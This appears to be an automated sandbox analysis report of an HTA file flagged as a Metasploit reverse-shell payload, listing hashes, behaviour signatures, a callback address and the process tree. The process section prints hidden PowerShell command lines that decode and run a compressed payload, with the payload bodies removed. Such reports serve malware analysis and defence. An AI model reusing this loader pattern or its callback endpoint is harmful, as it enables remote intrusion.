Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system
submitted: 23-05-2024 18:31
Static task: static1
Behavioral task: behavioral1
Sample: 568178389480e9f8368e66d811b105fe.hta
Resource: win7-20240220-en
Behavioral task: behavioral2
Sample: 568178389480e9f8368e66d811b105fe.hta
Resource: win10v2004-20240508-en
General
Target: 568178389480e9f8368e66d811b105fe.hta
Size: 7KB
MD5: 568178389480e9f8368e66d811b105fe
SHA1: 34c19d4b6bc99440b30ee9922a566ded9bd7a287
SHA256: 5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e
SHA512: 7bf3b91350ad635543cb92167d3e0b28d7d51164b8da040ea0740e672bfdad7d4242b25ba42b12a1c4cd266cbf44fa1ae6b8c34b01eea61ffa3687e8fd06e9ed
SSDEEP: 192:gn2jh1hqT2TsQL36ANDaqkvhYXMl9tKTsQGF6hd9d:gn2jh1hszMLBa5vhB94Tl1hd9d
Malware Config
Extracted
metasploit
windows/shell_reverse_tcp
144.76.219.54:8000
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 5 IoCs
Processes: powershell.exe
flow  pid   process
2     2632  powershell.exe
2     2632  powershell.exe
2     2632  powershell.exe
2     2632  powershell.exe
2     2632  powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes: powershell.exe, powershell.exe
pid   process
3064  powershell.exe
2632  powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes: mshta.exe
description  ioc  process
Key created  \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes: powershell.exe, powershell.exe
pid   process
3064  powershell.exe
2632  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: powershell.exe, powershell.exe
description              pid   process
Token: SeDebugPrivilege  3064  powershell.exe
Token: SeDebugPrivilege  2632  powershell.exe
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes: mshta.exe, powershell.exe
description                       pid   process         target process
PID 3036 wrote to memory of 3064  3036  mshta.exe       powershell.exe
PID 3036 wrote to memory of 3064  3036  mshta.exe       powershell.exe
PID 3036 wrote to memory of 3064  3036  mshta.exe       powershell.exe
PID 3036 wrote to memory of 3064  3036  mshta.exe       powershell.exe
PID 3064 wrote to memory of 2632  3064  powershell.exe  powershell.exe
PID 3064 wrote to memory of 2632  3064  powershell.exe  powershell.exe
PID 3064 wrote to memory of 2632  3064  powershell.exe  powershell.exe
PID 3064 wrote to memory of 2632  3064  powershell.exe  powershell.exe
Processes
-
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\568178389480e9f8368e66d811b105fe.hta"
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e [encoded command removed]
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('[Base64-encoded gzip payload removed]')-f'P','u')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: 4d8baa261134681987f4065c5a93d6e0
SHA1: 2367972d747d1e244eefe73acd56b7402c217c27
SHA256: e9715e3ef203e324e3afff3404777c965b7a44dab1c286b065318780d9e1edd6
SHA512: 9281cd6360ac4e0e99221d0fbe3a9c54d9a646204108e8daada6b85248bfea184b08dfce9ba1fefa8f61728aaf2aa9d927d580ce20b5ac72309360f0cd6da452
-
memory/2632-7-0x0000000005630000-0x0000000005631000-memory.dmp
Filesize: 4KB